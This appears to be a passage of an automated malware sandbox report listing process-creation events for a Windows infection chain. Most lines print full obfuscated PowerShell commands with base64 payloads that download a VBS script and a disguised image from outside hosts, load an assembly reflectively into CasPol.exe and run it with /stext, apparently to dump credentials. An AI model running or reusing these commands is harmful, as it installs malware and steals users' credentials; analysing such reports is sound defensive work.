                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwerSHEll.EXe -EX BypasS -NOp -w 1 -c DEViCecredEnTiAldEPloyMEnT ; INVokE-EXpreSsIOn($(INvoke-exPressIOn('[SYStEM.tEXT.eNCoDINg]'+[CHAr]0X3A+[ChAr]0x3a+'UtF8.GeTSTRing([SYsteM.CONveRT]'+[CHaR]0X3A+[cHar]58+'FrOmbaSe64sTrIng('+[cHar]34+'JG0yICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhZGQtdHlQZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1FTWJlUmRlRmlOaVRJT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1ckxNT24uRGxsIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEdqaE1tTXZxR0tHLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgbGhTSyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENRQkFlWlQsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSUNFY1JkZUlVeCxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHB6eHh6cG1JKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbkFNZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIlp4ek5LWW9HSndQIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTWVTcEFDRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgS3F6R2pUICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkbTI6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xNDIuOTMuNjUuMTYxLzY4MC93ZW5lZWRraXNzaW5nd2VsbG9uZ2lybGZyaWVuZHNoZWJlYXV0aWZ1bGdpcmwudElGIiwiJGVOVjpBUFBEQVRBXHdlbmVlZGtpc3Npbmd3ZWxsb25naXJsZnJpZW5kc2hlYmVhdXRpZi52YlMiLDAsMCk7U3RBUnQtU0xFRXAoMyk7aWkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRU52OkFQUERBVEFcd2VuZWVka2lzc2luZ3dlbGxvbmdpcmxmcmllbmRzaGViZWF1dGlmLnZiUyI='+[ChaR]34+'))')))"
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\tc3erle0\tc3erle0.cmdline"
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESF4EA.tmp" "c:\Users\user\AppData\Local\Temp\tc3erle0\CSCE42B52D3958749FFBAC69A71E4122F1.TMP"
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\weneedkissingwellongirlfriendshebeautif.vbS"
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $biscato = 'JHNvcnJlbmFyID0gJ2h0dHBzOi8vcmVzLmNsb3VkaW5hcnkuY29tL2R5dGZsdDYxbi9pbWFnZS91cGxvYWQvdjE3MzMxMzQ5NDcvYmtscHlzZXlldXQ0aW1wdzUwbjEuanBnICc7JGRlc2VyZGFyID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDskZGVzYXZlc3NvID0gJGRlc2VyZGFyLkRvd25sb2FkRGF0YSgkc29ycmVuYXIpOyR0b21iZWlybyA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKCRkZXNhdmVzc28pOyRjcmV0aW5pemFyID0gJzw8QkFTRTY0X1NUQVJUPj4nOyRnbGFuZHVsaWZvcm1lID0gJzw8QkFTRTY0X0VORD4+JzskZ3Jvc2EgPSAkdG9tYmVpcm8uSW5kZXhPZigkY3JldGluaXphcik7JHRyaWdsb3R0aXNtbyA9ICR0b21iZWlyby5JbmRleE9mKCRnbGFuZHVsaWZvcm1lKTskZ3Jvc2EgLWdlIDAgLWFuZCAkdHJpZ2xvdHRpc21vIC1ndCAkZ3Jvc2E7JGdyb3NhICs9ICRjcmV0aW5pemFyLkxlbmd0aDskZGVzYWJhZmFyID0gJHRyaWdsb3R0aXNtbyAtICRncm9zYTskc29mZnJpdmVsbWVudGUgPSAkdG9tYmVpcm8uU3Vic3RyaW5nKCRncm9zYSwgJGRlc2FiYWZhcik7JGNvbnRyYWNhbWJpYXIgPSAtam9pbiAoJHNvZmZyaXZlbG1lbnRlLlRvQ2hhckFycmF5KCkgfCBGb3JFYWNoLU9iamVjdCB7ICRfIH0pWy0xLi4tKCRzb2Zmcml2ZWxtZW50ZS5MZW5ndGgpXTskY2F0YXJhY3RhID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygkY29udHJhY2FtYmlhcik7JGJhbWJ1bGEgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKCRjYXRhcmFjdGEpOyR0cmluY29sZWpvID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZCgnVkFJJyk7JHRyaW5jb2xlam8uSW52b2tlKCRudWxsLCBAKCd0eHQuUkVSVlJTLzA4Ni8xNjEuNTYuMzkuMjQxLy86cHR0aCcsICckYW5pbWFyJywgJyRhbmltYXInLCAnJGFuaW1hcicsICdDYXNQb2wnLCAnJGFuaW1hcicsICckYW5pbWFyJywnJGFuaW1hcicsJyRhbmltYXInLCckYW5pbWFyJywnJGFuaW1hcicsJyRhbmltYXInLCcxJywnJGFuaW1hcicpKTs=';$desalinhadamente = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($biscato));Invoke-Expression $desalinhadamente
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\user\AppData\Local\Temp\tozq"
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\user\AppData\Local\Temp\wieivps"
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\user\AppData\Local\Temp\gcjtvhddyq"
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"
                  Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" "/C POwerSHEll.EXe -EX BypasS -NOp -w 1 -c DEViCecredEnTiAldEPloyMEnT ; INVokE-EXpreSsIOn($(INvoke-exPressIOn('[SYStEM.tEXT.eNCoDINg]'+[CHAr]0X3A+[ChAr]0x3a+'UtF8.GeTSTRing([SYsteM.CONveRT]'+[CHaR]0X3A+[cHar]58+'FrOmbaSe64sTrIng('+[cHar]34+'JG0yICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhZGQtdHlQZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1FTWJlUmRlRmlOaVRJT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1ckxNT24uRGxsIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEdqaE1tTXZxR0tHLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgbGhTSyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENRQkFlWlQsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSUNFY1JkZUlVeCxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHB6eHh6cG1JKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbkFNZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIlp4ek5LWW9HSndQIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTWVTcEFDRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgS3F6R2pUICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkbTI6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xNDIuOTMuNjUuMTYxLzY4MC93ZW5lZWRraXNzaW5nd2VsbG9uZ2lybGZyaWVuZHNoZWJlYXV0aWZ1bGdpcmwudElGIiwiJGVOVjpBUFBEQVRBXHdlbmVlZGtpc3Npbmd3ZWxsb25naXJsZnJpZW5kc2hlYmVhdXRpZi52YlMiLDAsMCk7U3RBUnQtU0xFRXAoMyk7aWkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRU52OkFQUERBVEFcd2VuZWVka2lzc2luZ3dlbGxvbmdpcmxmcmllbmRzaGViZWF1dGlmLnZiUyI='+[ChaR]34+'))')))"Jump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwerSHEll.EXe -EX BypasS -NOp -w 1 -c DEViCecredEnTiAldEPloyMEnT ; INVokE-EXpreSsIOn($(INvoke-exPressIOn('[SYStEM.tEXT.eNCoDINg]'+[CHAr]0X3A+[ChAr]0x3a+'UtF8.GeTSTRing([SYsteM.CONveRT]'+[CHaR]0X3A+[cHar]58+'FrOmbaSe64sTrIng('+[cHar]34+'JG0yICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhZGQtdHlQZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1FTWJlUmRlRmlOaVRJT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1ckxNT24uRGxsIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEdqaE1tTXZxR0tHLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgbGhTSyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENRQkFlWlQsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSUNFY1JkZUlVeCxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHB6eHh6cG1JKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbkFNZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIlp4ek5LWW9HSndQIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTWVTcEFDRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgS3F6R2pUICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkbTI6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xNDIuOTMuNjUuMTYxLzY4MC93ZW5lZWRraXNzaW5nd2VsbG9uZ2lybGZyaWVuZHNoZWJlYXV0aWZ1bGdpcmwudElGIiwiJGVOVjpBUFBEQVRBXHdlbmVlZGtpc3Npbmd3ZWxsb25naXJsZnJpZW5kc2hlYmVhdXRpZi52YlMiLDAsMCk7U3RBUnQtU0xFRXAoMyk7aWkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRU52OkFQUERBVEFcd2VuZWVka2lzc2luZ3dlbGxvbmdpcmxmcmllbmRzaGViZWF1dGlmLnZiUyI='+[ChaR]34+'))')))"Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\sietgs52\sietgs52.cmdline"Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\weneedkissingwellongirlfriendshebeautif.vbS" Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESBBA2.tmp" "c:\Users\user\AppData\Local\Temp\sietgs52\CSC6D12096A8D2545939E28F0D748EE93EA.TMP"Jump to behavior
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $biscato = 'JHNvcnJlbmFyID0gJ2h0dHBzOi8vcmVzLmNsb3VkaW5hcnkuY29tL2R5dGZsdDYxbi9pbWFnZS91cGxvYWQvdjE3MzMxMzQ5NDcvYmtscHlzZXlldXQ0aW1wdzUwbjEuanBnICc7JGRlc2VyZGFyID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDskZGVzYXZlc3NvID0gJGRlc2VyZGFyLkRvd25sb2FkRGF0YSgkc29ycmVuYXIpOyR0b21iZWlybyA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKCRkZXNhdmVzc28pOyRjcmV0aW5pemFyID0gJzw8QkFTRTY0X1NUQVJUPj4nOyRnbGFuZHVsaWZvcm1lID0gJzw8QkFTRTY0X0VORD4+JzskZ3Jvc2EgPSAkdG9tYmVpcm8uSW5kZXhPZigkY3JldGluaXphcik7JHRyaWdsb3R0aXNtbyA9ICR0b21iZWlyby5JbmRleE9mKCRnbGFuZHVsaWZvcm1lKTskZ3Jvc2EgLWdlIDAgLWFuZCAkdHJpZ2xvdHRpc21vIC1ndCAkZ3Jvc2E7JGdyb3NhICs9ICRjcmV0aW5pemFyLkxlbmd0aDskZGVzYWJhZmFyID0gJHRyaWdsb3R0aXNtbyAtICRncm9zYTskc29mZnJpdmVsbWVudGUgPSAkdG9tYmVpcm8uU3Vic3RyaW5nKCRncm9zYSwgJGRlc2FiYWZhcik7JGNvbnRyYWNhbWJpYXIgPSAtam9pbiAoJHNvZmZyaXZlbG1lbnRlLlRvQ2hhckFycmF5KCkgfCBGb3JFYWNoLU9iamVjdCB7ICRfIH0pWy0xLi4tKCRzb2Zmcml2ZWxtZW50ZS5MZW5ndGgpXTskY2F0YXJhY3RhID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygkY29udHJhY2FtYmlhcik7JGJhbWJ1bGEgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKCRjYXRhcmFjdGEpOyR0cmluY29sZWpvID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZCgnVkFJJyk7JHRyaW5jb2xlam8uSW52b2tlKCRudWxsLCBAKCd0eHQuUkVSVlJTLzA4Ni8xNjEuNTYuMzkuMjQxLy86cHR0aCcsICckYW5pbWFyJywgJyRhbmltYXInLCAnJGFuaW1hcicsICdDYXNQb2wnLCAnJGFuaW1hcicsICckYW5pbWFyJywnJGFuaW1hcicsJyRhbmltYXInLCckYW5pbWFyJywnJGFuaW1hcicsJyRhbmltYXInLCcxJywnJGFuaW1hcicpKTs=';$desalinhadamente = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($biscato));Invoke-Expression $desalinhadamenteJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"Jump to behavior
                  Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" "/C POwerSHEll.EXe -EX BypasS -NOp -w 1 -c DEViCecredEnTiAldEPloyMEnT ; INVokE-EXpreSsIOn($(INvoke-exPressIOn('[SYStEM.tEXT.eNCoDINg]'+[CHAr]0X3A+[ChAr]0x3a+'UtF8.GeTSTRing([SYsteM.CONveRT]'+[CHaR]0X3A+[cHar]58+'FrOmbaSe64sTrIng('+[cHar]34+'JG0yICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhZGQtdHlQZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1FTWJlUmRlRmlOaVRJT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1ckxNT24uRGxsIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEdqaE1tTXZxR0tHLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgbGhTSyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENRQkFlWlQsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSUNFY1JkZUlVeCxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHB6eHh6cG1JKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbkFNZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIlp4ek5LWW9HSndQIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTWVTcEFDRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgS3F6R2pUICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkbTI6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xNDIuOTMuNjUuMTYxLzY4MC93ZW5lZWRraXNzaW5nd2VsbG9uZ2lybGZyaWVuZHNoZWJlYXV0aWZ1bGdpcmwudElGIiwiJGVOVjpBUFBEQVRBXHdlbmVlZGtpc3Npbmd3ZWxsb25naXJsZnJpZW5kc2hlYmVhdXRpZi52YlMiLDAsMCk7U3RBUnQtU0xFRXAoMyk7aWkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRU52OkFQUERBVEFcd2VuZWVka2lzc2luZ3dlbGxvbmdpcmxmcmllbmRzaGViZWF1dGlmLnZiUyI='+[ChaR]34+'))')))"Jump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwerSHEll.EXe -EX BypasS -NOp -w 1 -c DEViCecredEnTiAldEPloyMEnT ; INVokE-EXpreSsIOn($(INvoke-exPressIOn('[SYStEM.tEXT.eNCoDINg]'+[CHAr]0X3A+[ChAr]0x3a+'UtF8.GeTSTRing([SYsteM.CONveRT]'+[CHaR]0X3A+[cHar]58+'FrOmbaSe64sTrIng('+[cHar]34+'JG0yICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhZGQtdHlQZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1FTWJlUmRlRmlOaVRJT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1ckxNT24uRGxsIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEdqaE1tTXZxR0tHLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgbGhTSyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENRQkFlWlQsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSUNFY1JkZUlVeCxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHB6eHh6cG1JKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbkFNZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIlp4ek5LWW9HSndQIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTWVTcEFDRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgS3F6R2pUICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkbTI6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xNDIuOTMuNjUuMTYxLzY4MC93ZW5lZWRraXNzaW5nd2VsbG9uZ2lybGZyaWVuZHNoZWJlYXV0aWZ1bGdpcmwudElGIiwiJGVOVjpBUFBEQVRBXHdlbmVlZGtpc3Npbmd3ZWxsb25naXJsZnJpZW5kc2hlYmVhdXRpZi52YlMiLDAsMCk7U3RBUnQtU0xFRXAoMyk7aWkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRU52OkFQUERBVEFcd2VuZWVka2lzc2luZ3dlbGxvbmdpcmxmcmllbmRzaGViZWF1dGlmLnZiUyI='+[ChaR]34+'))')))"
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\tc3erle0\tc3erle0.cmdline"
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\weneedkissingwellongirlfriendshebeautif.vbS"
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESF4EA.tmp" "c:\Users\user\AppData\Local\Temp\tc3erle0\CSCE42B52D3958749FFBAC69A71E4122F1.TMP"
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $biscato = 'JHNvcnJlbmFyID0gJ2h0dHBzOi8vcmVzLmNsb3VkaW5hcnkuY29tL2R5dGZsdDYxbi9pbWFnZS91cGxvYWQvdjE3MzMxMzQ5NDcvYmtscHlzZXlldXQ0aW1wdzUwbjEuanBnICc7JGRlc2VyZGFyID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDskZGVzYXZlc3NvID0gJGRlc2VyZGFyLkRvd25sb2FkRGF0YSgkc29ycmVuYXIpOyR0b21iZWlybyA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKCRkZXNhdmVzc28pOyRjcmV0aW5pemFyID0gJzw8QkFTRTY0X1NUQVJUPj4nOyRnbGFuZHVsaWZvcm1lID0gJzw8QkFTRTY0X0VORD4+JzskZ3Jvc2EgPSAkdG9tYmVpcm8uSW5kZXhPZigkY3JldGluaXphcik7JHRyaWdsb3R0aXNtbyA9ICR0b21iZWlyby5JbmRleE9mKCRnbGFuZHVsaWZvcm1lKTskZ3Jvc2EgLWdlIDAgLWFuZCAkdHJpZ2xvdHRpc21vIC1ndCAkZ3Jvc2E7JGdyb3NhICs9ICRjcmV0aW5pemFyLkxlbmd0aDskZGVzYWJhZmFyID0gJHRyaWdsb3R0aXNtbyAtICRncm9zYTskc29mZnJpdmVsbWVudGUgPSAkdG9tYmVpcm8uU3Vic3RyaW5nKCRncm9zYSwgJGRlc2FiYWZhcik7JGNvbnRyYWNhbWJpYXIgPSAtam9pbiAoJHNvZmZyaXZlbG1lbnRlLlRvQ2hhckFycmF5KCkgfCBGb3JFYWNoLU9iamVjdCB7ICRfIH0pWy0xLi4tKCRzb2Zmcml2ZWxtZW50ZS5MZW5ndGgpXTskY2F0YXJhY3RhID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygkY29udHJhY2FtYmlhcik7JGJhbWJ1bGEgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKCRjYXRhcmFjdGEpOyR0cmluY29sZWpvID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZCgnVkFJJyk7JHRyaW5jb2xlam8uSW52b2tlKCRudWxsLCBAKCd0eHQuUkVSVlJTLzA4Ni8xNjEuNTYuMzkuMjQxLy86cHR0aCcsICckYW5pbWFyJywgJyRhbmltYXInLCAnJGFuaW1hcicsICdDYXNQb2wnLCAnJGFuaW1hcicsICckYW5pbWFyJywnJGFuaW1hcicsJyRhbmltYXInLCckYW5pbWFyJywnJGFuaW1hcicsJyRhbmltYXInLCcxJywnJGFuaW1hcicpKTs=';$desalinhadamente = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($biscato));Invoke-Expression $desalinhadamente
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\user\AppData\Local\Temp\tozq"
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\user\AppData\Local\Temp\wieivps"
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\user\AppData\Local\Temp\gcjtvhddyq"
                  Source: C:\Windows\System32\mshta.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: dwmapi.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: rpcrtremote.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: secur32.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: webio.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: iphlpapi.dllJump to behavior
